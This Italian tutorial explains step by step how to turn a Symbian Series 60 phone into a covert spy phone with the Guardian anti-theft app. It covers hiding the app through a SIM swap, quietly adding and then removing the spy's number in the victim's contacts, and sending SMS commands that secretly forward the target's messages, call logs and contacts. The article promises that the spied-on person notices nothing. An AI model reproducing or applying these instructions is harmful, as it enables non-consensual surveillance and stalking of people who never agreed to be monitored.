Come spiare un cellulare gratis

di

Belli i cellulari spia dei telefilm di investigazioni, vero? Bravo. Mi hai capito, una volta tanto, al volo! Una persona si ritrova fra le mani un cellulare spia, che manda informazioni, come gli SMS inviati e ricevuti, le chiamate fatte e ricevute o la Rubrica, ad un investigatore, che se ne sta comodo nel suo ufficio. Ovviamente la persona spiata non si accorge di nulla.

Ebbene, ti posso dire che quella dei cellulari spia non è mica fantascienza! Se vuoi creare un cellulare spia, basta che tu abbia un cellulare con sistema operativo Symbian Series 60, indicato nella sezione Compatibilità di questo sito, e i soldi per due caffè (tre euro). Se non ci credi, seguimi. Il cellulare spia che andremo a creare ha la possibilità di recuperare gli SMS inviati e ricevuti, le lista delle chiamate fatte e ricevute i contatti della Rubrica del cellulare spiato (da ora in poi: cellulare spia).

Prendi il cellulare con sistema operativo Symbian Series 60 che deve essere indicato nella sezione Compatibilità di questo sito e che vuoi trasformare in cellulare spia ed inserisci una SIM diversa da quella che verrà usata abitualmente nel cellulare. Adesso, accendi il cellulare e digita *#06* per conoscere il suo codice IMEI.

A questo punto, collegati su questa pagina Web, inserisci il codice IMEI ottenuto precedentemente nella voce IMEI Cellulare e scegli la forma di pagamento per te migliore. Se usi la carta di credito, fai click sul pulsante Paypal.

Cellulare spia

Terminato il pagamento, su cui non mi soffermo, ricevi una e-mail con un codice per attivare il programma Guardian. Non ti resta ora che scaricare ed installare Guardian. Per farlo, collegati su questo sito Internet e fai click su Italian nella sezione Download Guardian.

Cellulare spia

Dopo aver scaricato Guardian, scompatta l’archivio in una cartella del tuo computer. Se il cellulare spia è un Nokia ed hai installato PC Suite sul tuo computer, per installare il programma, collega il cellulare al PC e fai doppio click sul file estratto, chiamato guardian05.sis.

Nella finestra che si apre, fai click su e poi su Ok. Nel cellulare, fai click due volte di seguito su e poi altre due volte di seguito su OK. Hai appena terminato di installare Guardian sul cellulare spia! Per farlo funzionare, spegni e accendi il tuo cellulare.

Call Cheater

Dopo aver acceso il cellulare, premi il tasto Menu, spostati in Preferiti e apri Guardian. Fai click sul menu Opzioni e seleziona Supporto. Inserisci il codice donazione ottenuto via e-mail e fai click su OK. Adesso dobbiamo passare a configurare Guardian.

Guardian è in realtà un sistema antifurto per cellulari Symbian Series 60, tuttavia, usando delle precise impostazioni, possiamo utilizzarlo per creare un cellulare spia in pochi passi. Dicevamo? Ah, sì! Spostati nella seconda linguetta e poi sulla voce Destinatario.

Seleziona il menu Opzioni e poi Cambia. Devi ora selezionare dalla rubrica del cellulare che si deve spiare il contatto a cui mandare gli SMS e la Rubrica. Possiamo aggiungere alla rubrica temporaneamente il nostro numero di cellulare e poi cancellarlo.

Cellulare spia

Impostata questa voce, spostati in quella successiva: Esegui Comandi SMS. Fai click sul menu Opzioni, seleziona Cambia e poi fai click su . Ora spostati in Password, fai click sul menu Opzioni e seleziona Cambia.

Cellulare spia

Scrivi ed annota da qualche parte la password che digiti: ti servirà per accedere al cellulare spia di nascosto. Abbiamo quasi finito! Stancante creare un cellulare spia, eh? Fai click su Esci e poi su . Adesso, devi cambiare SIM e rimettere quella che sarà usata abitualmente nel cellulare da spiare. Perché l’avevi cambiata, vero?

Non appena cambi SIM, il programma Guardian sparirà dalla cartella Preferiti, dove si trovano i programmi del tuo cellulare, e sarà pronto a mandarti tutte le informazioni che desideri. Non abbiamo però ancora finito. Non appena cambi la SIM ed accendi il cellulare, ricevi un SMS al numero di cellulare impostato in Guardian che ti dice che la SIM è stata cambiata. Questo accade ogni volta che accendi il cellulare spia.

Per disattivare questo comportamento, manda al cellulare spia da un altro cellulare questo SMS (scrivi i comandi in maiuscolo!):

//PASSWORDIMPOSTATAPRIMA//CONFIG//STOPSMS

Fatto questo, se vuoi ricevere gli SMS ricevuti/inviati, la lista delle chiamate effettuate/ricevute e i contatti della Rubrica aggiunti DOPO che è stato installato il programma Guardian, invia questo SMS al cellulare spia:

//PASSWORDIMPOSTATAPRIMA//FORWARD//DATA=NEW INBOX=999 OUTBOX=999 INCALLS=999 OUTCALLS=999 CONTACTS=999

Per scoprire altri comandi da mandare al cellulare spia, consulta questa pagina.